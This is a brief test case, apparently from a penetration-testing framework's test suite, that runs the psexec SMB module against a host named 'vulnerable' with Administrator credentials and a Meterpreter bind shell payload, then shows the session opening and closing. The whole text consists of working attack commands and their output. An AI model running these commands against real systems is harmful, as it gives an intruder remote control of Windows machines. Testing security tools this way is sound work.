psexec This test runs psexec on a vulnerable host. use windows/smb/psexec set WORKSPACE default set RHOST vulnerable set SMBUser Administrator set SMBPass set payload windows/meterpreter/bind_tcp exploit -z exit Meterpreter session 1 opened Meterpreter session 1 closed. Reason: User exit